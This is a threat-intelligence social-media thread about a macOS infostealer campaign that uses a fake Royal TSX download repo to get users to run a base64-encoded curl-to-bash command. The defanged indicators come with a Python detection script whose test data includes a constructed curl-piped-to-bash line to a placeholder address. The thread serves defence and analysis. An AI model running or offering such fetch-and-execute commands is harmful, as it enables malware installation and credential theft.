Nice, I've found an infostealer and macOS malware in the wild!

This repo just has some info and a download button for a paid macOS app.

It links to hxxps://za-loop-osx-software[.]github[.]io/.github/RoyalTSX, which redirects you to hxxps://github[.]topic-developer[.]com/packages.html, which tells you to run a curl command and pipe it into bash, encoded in a base64 string.

The curl command grabs a file from 217[.]119[.]139[.]117, which looks like an infostealer and some other malware written in AppleScript.

Have fun SOC people.

#threatintel #macos #cybersecurity

GitHub - Royal-TSX-Mac-License-App/Royal-TSX-Mac: Comprehensive remote connection manager for macOS with support for RDP, VNC, SSH, and FTP with credential management and team sharing features.

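The chain described in this post (a base64 string decoded and piped into bash, which then runs curl piped into bash) leaves a recognisable shape in process-execution telemetry. The following is an added example, not code from the post or from the campaign: it triages constructed command lines, decodes long base64 tokens to inspect what they hide, and flags both the outer and the decoded stage. The sample commands, the TEST-NET placeholder address 203.0.113.5 and the payload string are all constructed.

```python
import base64
import re

# Constructed sample command lines modelled on the chain in the post.
# STAGE_ONE stands in for the real payload; 203.0.113.5 is a placeholder.
STAGE_ONE = "curl -fsSL http://203.0.113.5/x | bash"
SAMPLE_CMDS = [
    "echo " + base64.b64encode(STAGE_ONE.encode()).decode() + " | base64 -d | bash",
    "git clone https://github.com/example/repo",
    "curl -fsSL https://example.org/install.sh | sh",
    "ls -la /Applications",
]

PIPE_TO_SHELL = re.compile(r"\|\s*(?:sudo\s+)?(?:ba|z)?sh\b")
B64_DECODE = re.compile(r"base64\s+(?:-d|-D|--decode)")  # macOS accepts -D and -d
CURL_FETCH = re.compile(r"\bcurl\b")
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def decoded_payloads(cmd):
    """Base64-decode long tokens in a command line; keep only printable text."""
    out = []
    for tok in B64_TOKEN.findall(cmd):
        try:
            text = base64.b64decode(tok, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # not real base64 (e.g. a path fragment) or not text
        if text.isprintable():
            out.append(text)
    return out


def classify(cmd):
    """Return the reasons a command line looks like this chain (empty = clean)."""
    reasons = []
    if B64_DECODE.search(cmd) and PIPE_TO_SHELL.search(cmd):
        reasons.append("base64-decoded content piped to a shell")
    if CURL_FETCH.search(cmd) and PIPE_TO_SHELL.search(cmd):
        reasons.append("curl output piped to a shell")
    for inner in decoded_payloads(cmd):  # look inside the encoded stage
        if CURL_FETCH.search(inner) and PIPE_TO_SHELL.search(inner):
            reasons.append("decoded payload contains curl piped to a shell")
    return reasons


def triage(cmds):
    """Map each suspicious command line to its reasons."""
    return {c: classify(c) for c in cmds if classify(c)}


if __name__ == "__main__":
    for cmd, why in triage(SAMPLE_CMDS).items():
        print(cmd[:60], "->", why)
```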

@jtig Here are a few more that are probably from the same campaign. FYI.


@RecklessPush38671 nice! How did you find this?

@jtig I was using URLScan Pro. This campaign has come up in the past at work and I've gotten pretty good at finding these pages using URLscan.

FWIW, this seems to be the same campaign that Huntress wrote about last month. The early stages of the attack are different but the rest of it looks to be the same. They go into some good detail about the malware, too.

https://www.huntress.com/blog/amos-stealer-chatgpt-grok-ai-trust

AI-Poisoning & AMOS Stealer: How Trust Became the Biggest Mac Threat | Huntress
